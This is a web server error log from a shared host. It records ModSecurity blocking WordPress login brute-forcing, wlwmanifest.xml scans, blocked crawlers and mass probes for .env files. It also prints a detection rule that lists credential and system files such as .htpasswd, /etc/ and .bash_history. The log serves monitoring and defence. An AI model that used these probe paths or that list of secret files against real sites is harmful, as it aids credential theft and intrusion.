[Tue May 26 20:06:41.431104 2026] [security2:error] [pid 113091:tid 113201] [remote 194.163.139.224:41450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWv-aPxBGSmlFNOy6pflgACU20"]
[Tue May 26 20:06:42.379297 2026] [security2:error] [pid 113091:tid 113116] [remote 194.163.139.224:41450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.139.163.194.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWv-qPxBGSmlFNOy6pftgACdxg"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 20:06:42.593102 2026] [security2:error] [pid 112029:tid 112244] [client 114.119.133.46:46243] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.bloggertarget.com"] [uri "/sitemap.xml"] [unique_id "ahWv-qFW0C-ajaCsyFdPvAAAAV8"], referer: https://bloggertarget.com/
[Tue May 26 20:06:42.685452 2026] [security2:error] [pid 113091:tid 113323] [client 14.186.58.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv-qPxBGSmlFNOy6pftQAAAno"]
[Tue May 26 20:06:43.277430 2026] [autoindex:error] [pid 113091:tid 113258] [client 199.45.155.101:0] AH01276: Cannot serve directory /home1/bloggkcf/public_html/subbroker.in/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 20:06:43.908372 2026] [security2:error] [pid 113091:tid 113224] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv-6PxBGSmlFNOy6pf4AAAAhc"]
[Tue May 26 20:06:45.887907 2026] [security2:error] [pid 112029:tid 112198] [client 45.154.98.38:62362] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/wp-includes/wlwmanifest.xml"] [unique_id "ahWv_aFW0C-ajaCsyFdP9AAAATE"]
[Tue May 26 20:06:45.967597 2026] [security2:error] [pid 113091:tid 113263] [client 209.163.116.255:11229] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWv_aPxBGSmlFNOy6pgFQAAAj4"], referer: https://anujtradingco.com
[Tue May 26 20:06:45.987724 2026] [security2:error] [pid 112029:tid 112163] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWv_aFW0C-ajaCsyFdP7gAAAQ4"]
[Tue May 26 20:06:46.613877 2026] [security2:error] [pid 112029:tid 112197] [client 45.154.98.38:55426] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 38.98.154.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/xmlrpc.php"] [unique_id "ahWv_qFW0C-ajaCsyFdP_QAAATA"]
[Tue May 26 20:06:47.196529 2026] [security2:error] [pid 113091:tid 113327] [client 45.154.98.38:52483] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahWv_6PxBGSmlFNOy6pgUgAAAn4"]
[Tue May 26 20:06:47.809677 2026] [security2:error] [pid 113091:tid 113291] [client 45.154.98.38:51841] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWv_6PxBGSmlFNOy6pgaQAAAlo"]
[Tue May 26 20:06:48.411013 2026] [security2:error] [pid 112029:tid 112164] [client 45.154.98.38:51890] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWwAKFW0C-ajaCsyFdQEwAAAQ8"]
[Tue May 26 20:06:48.432876 2026] [security2:error] [pid 113091:tid 113277] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwAKPxBGSmlFNOy6pgbgAAAkw"]
[Tue May 26 20:06:48.963966 2026] [security2:error] [pid 113091:tid 113242] [client 114.119.157.37:49791] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "haddingtonwines.com"] [uri "/product-category/rose-wines"] [unique_id "ahWwAKPxBGSmlFNOy6pglQAAAik"], referer: https://haddingtonwines.com/product-category/rose-wines
[Tue May 26 20:06:49.018390 2026] [security2:error] [pid 112029:tid 112271] [client 45.154.98.38:52089] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWwAaFW0C-ajaCsyFdQGQAAAXo"]
[Tue May 26 20:06:49.634844 2026] [security2:error] [pid 113091:tid 113235] [client 45.154.98.38:52513] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahWwAaPxBGSmlFNOy6pgogAAAiI"]
[Tue May 26 20:06:50.233298 2026] [security2:error] [pid 112029:tid 112198] [client 45.154.98.38:55769] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWwAqFW0C-ajaCsyFdQNQAAATE"]
[Tue May 26 20:06:50.849637 2026] [security2:error] [pid 112029:tid 112193] [client 45.154.98.38:58360] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/2018/wp-includes/wlwmanifest.xml"] [unique_id "ahWwAqFW0C-ajaCsyFdQPwAAASw"]
[Tue May 26 20:06:51.226631 2026] [security2:error] [pid 112029:tid 112147] [remote 87.106.67.224:39280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.67.106.87.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWwA6FW0C-ajaCsyFdQQQABLXU"]
[Tue May 26 20:06:51.439110 2026] [security2:error] [pid 113091:tid 113288] [client 45.154.98.38:63161] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWwA6PxBGSmlFNOy6pg2QAAAlc"]
[Tue May 26 20:06:51.511464 2026] [security2:error] [pid 113091:tid 113313] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwA6PxBGSmlFNOy6pgywAAAnA"]
[Tue May 26 20:06:52.029319 2026] [security2:error] [pid 113091:tid 113221] [client 45.154.98.38:52483] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahWwBKPxBGSmlFNOy6pg8gAAAhQ"]
[Tue May 26 20:06:52.147193 2026] [security2:error] [pid 112029:tid 112173] [client 77.68.9.24:54501] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.samayikprasanga.in"] [uri "/images/images/cache.php"] [unique_id "ahWwBKFW0C-ajaCsyFdQVAAAARg"], referer: www.google.com
[Tue May 26 20:06:52.640941 2026] [security2:error] [pid 113091:tid 113330] [client 45.154.98.38:63062] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWwBKPxBGSmlFNOy6pg_gAAAoE"]
[Tue May 26 20:06:52.693042 2026] [security2:error] [pid 112029:tid 112148] [remote 87.106.67.224:39280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 224.67.106.87.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWwBKFW0C-ajaCsyFdQXQABh3Y"], referer: https://canopykaapi.com/wp-login.php
[Tue May 26 20:06:53.164590 2026] [security2:error] [pid 112029:tid 112174] [client 207.180.11.213:47904] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "200"] [hostname "www.kexcouriers.com"] [uri "/img/form_file.png"] [unique_id "ahWwBaFW0C-ajaCsyFdQaAAAARk"]
[Tue May 26 20:06:53.227220 2026] [security2:error] [pid 113091:tid 113294] [client 45.154.98.38:63658] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWwBaPxBGSmlFNOy6phFgAAAl0"]
[Tue May 26 20:06:53.830900 2026] [security2:error] [pid 112029:tid 112202] [client 45.154.98.38:57562] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWwBaFW0C-ajaCsyFdQdwAAATU"]
[Tue May 26 20:06:53.967749 2026] [security2:error] [pid 113091:tid 113307] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwBaPxBGSmlFNOy6phHAAAAmo"]
[Tue May 26 20:06:54.353457 2026] [security2:error] [pid 113091:tid 113247] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWwBqPxBGSmlFNOy6phOwAAAi4"]
[Tue May 26 20:06:54.353806 2026] [security2:error] [pid 113091:tid 113339] [client 66.249.64.109:38757] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWwBqPxBGSmlFNOy6phNgAAAoo"]
[Tue May 26 20:06:54.422666 2026] [security2:error] [pid 113091:tid 113322] [client 45.154.98.38:54330] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWwBqPxBGSmlFNOy6phQQAAAnk"]
[Tue May 26 20:06:55.014522 2026] [security2:error] [pid 112029:tid 112243] [client 45.154.98.38:62480] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWwB6FW0C-ajaCsyFdQhAAAAV4"]
[Tue May 26 20:06:55.605195 2026] [security2:error] [pid 113091:tid 113290] [client 45.154.98.38:54825] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "jhonparra.com"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWwB6PxBGSmlFNOy6phbAAAAlk"]
[Tue May 26 20:06:56.198666 2026] [security2:error] [pid 113091:tid 113329] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwB6PxBGSmlFNOy6phcQAAAoA"]
[Tue May 26 20:06:56.273160 2026] [security2:error] [pid 112029:tid 112173] [client 66.249.64.109:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWwCKFW0C-ajaCsyFdQkAAAARg"]
[Tue May 26 20:06:56.273516 2026] [security2:error] [pid 113091:tid 113311] [client 66.249.64.109:38757] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "eco-green.com.mx"] [uri "/w2.php"] [unique_id "ahWwCKPxBGSmlFNOy6phgAAAAm4"]
[Tue May 26 20:06:58.970422 2026] [security2:error] [pid 113091:tid 113239] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwCqPxBGSmlFNOy6phzwAAAiY"]
[Tue May 26 20:07:01.507897 2026] [security2:error] [pid 113091:tid 113274] [client 57.141.2.33:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwDaPxBGSmlFNOy6piFwAAAkk"]
[Tue May 26 20:07:03.904686 2026] [security2:error] [pid 113091:tid 113279] [client 57.141.2.8:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwD6PxBGSmlFNOy6piZAAAAk4"]
[Tue May 26 20:07:05.029584 2026] [security2:error] [pid 113091:tid 113166] [remote 54.38.29.86:47094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWwEKPxBGSmlFNOy6piiAACgUo"]
[Tue May 26 20:07:06.039725 2026] [security2:error] [pid 113091:tid 113248] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwEaPxBGSmlFNOy6pipQAAAi8"]
[Tue May 26 20:07:07.419730 2026] [security2:error] [pid 113091:tid 113183] [remote 54.38.29.86:47094] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWwE6PxBGSmlFNOy6pi6gACWFs"], referer: https://filosha.com/wp-login.php
[Tue May 26 20:07:07.935189 2026] [security2:error] [pid 113091:tid 113334] [client 76.226.91.182:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwE6PxBGSmlFNOy6pi7gAAAoU"]
[Tue May 26 20:07:08.446840 2026] [security2:error] [pid 113091:tid 113243] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwE6PxBGSmlFNOy6pjAAAAAio"]
[Tue May 26 20:07:08.826120 2026] [security2:error] [pid 112029:tid 112252] [client 77.68.9.24:55286] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 24.9.68.77.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cpcontacts.samayikprasanga.in"] [uri "/images/images/cache.php"] [unique_id "ahWwFKFW0C-ajaCsyFdRhQAAAWc"], referer: www.google.com
[Tue May 26 20:07:10.502537 2026] [security2:error] [pid 113091:tid 113226] [client 134.209.28.66:54726] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "www.blog.jhonweb.com"] [uri "/index.php"] [unique_id "ahWwFqPxBGSmlFNOy6pjSwAAAhk"], referer: http://www.blog.jhonweb.com/
[Tue May 26 20:07:11.031407 2026] [security2:error] [pid 113091:tid 113240] [client 176.65.139.233:50526] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcontacts.glorodbalsa.com"] [uri "/___proxy_subdomain_cpcontacts/.env"] [unique_id "ahWwF6PxBGSmlFNOy6pjaAAAAic"]
[Tue May 26 20:07:11.035100 2026] [security2:error] [pid 113091:tid 113307] [client 176.65.139.236:55206] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.glorodbalsa.com"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahWwF6PxBGSmlFNOy6pjagAAAmo"]
[Tue May 26 20:07:11.043700 2026] [security2:error] [pid 112029:tid 112177] [client 176.65.139.229:54550] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webdisk.glorodbalsa.com"] [uri "/___proxy_subdomain_webdisk/.env"] [unique_id "ahWwF6FW0C-ajaCsyFdRpAAAARw"]
[Tue May 26 20:07:11.057330 2026] [security2:error] [pid 113091:tid 113330] [client 176.65.139.232:46790] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "mail.glorodbalsa.com"] [uri "/.env"] [unique_id "ahWwF6PxBGSmlFNOy6pjbAAAAoE"]
[Tue May 26 20:07:11.063677 2026] [security2:error] [pid 112029:tid 112163] [client 176.65.139.239:60056] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.glorodbalsa.com"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahWwF6FW0C-ajaCsyFdRpQAAAQ4"]
[Tue May 26 20:07:11.067666 2026] [security2:error] [pid 113091:tid 113338] [client 176.65.139.229:54552] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "webmail.glorodbalsa.com"] [uri "/___proxy_subdomain_webmail/.env"] [unique_id "ahWwF6PxBGSmlFNOy6pjbQAAAok"]
[Tue May 26 20:07:11.355362 2026] [security2:error] [pid 113091:tid 113236] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWwFqPxBGSmlFNOy6pjZgAAAiM"]
[Tue May 26 20:07:11.944263 2026] [security2:error] [pid 112029:tid 112079] [remote 45.13.190.75:35826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 75.190.13.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bosscoirs.com"] [uri "/wp-login.php"] [unique_id "ahWwF6FW0C-ajaCsyFdRrgABTzE"]
[Tue May 26 20:07:12.139238 2026] [security2:error] [pid 112029:tid 112236] [client 185.191.171.17:62574] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahWwGKFW0C-ajaCsyFdRtgAAAVc"]
[Tue May 26 20:07:12.139360 2026] [security2:error] [pid 112029:tid 112236] [client 185.191.171.17:62574] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahWwGKFW0C-ajaCsyFdRtgAAAVc"]
